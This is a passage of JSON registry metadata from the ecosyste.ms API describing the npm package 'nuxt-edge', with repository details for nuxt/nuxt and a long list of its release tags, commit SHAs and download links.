mail":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2026-02-11T12:13:35.592Z","updated_at":"2026-02-11T12:13:35.592Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2124462,"name":"nuxt-edge","ecosystem":"npm","description":"A minimalistic framework for server-rendered Vue.js applications (inspired by Next.js)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["nuxt","nuxt.js","nuxtjs","ssr","vue","vue isomorphic","vue server side","vue ssr","vue universal","vue versatile","vue.js","vuejs"],"namespace":null,"versions_count":2416,"first_release_published_at":"2018-01-08T17:22:10.230Z","latest_release_published_at":"2020-06-29T00:23:32.199Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-20T21:04:00.490Z","created_at":"2022-04-09T21:19:49.446Z","updated_at":"2026-03-20T21:04:00.491Z","registry_url":"https://www.npmjs.com/package/nuxt-edge","install_command":"npm install nuxt-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2023-12-20T11:59:07.596Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":212,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":179557006,"owners_count":10832333,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":53,"last_synced_at":"2023-04-09T19:46:25.677Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","created_at":"2022-11-02T16:30:40.909Z","updated_at":"2023-04-09T19:46:26.127Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_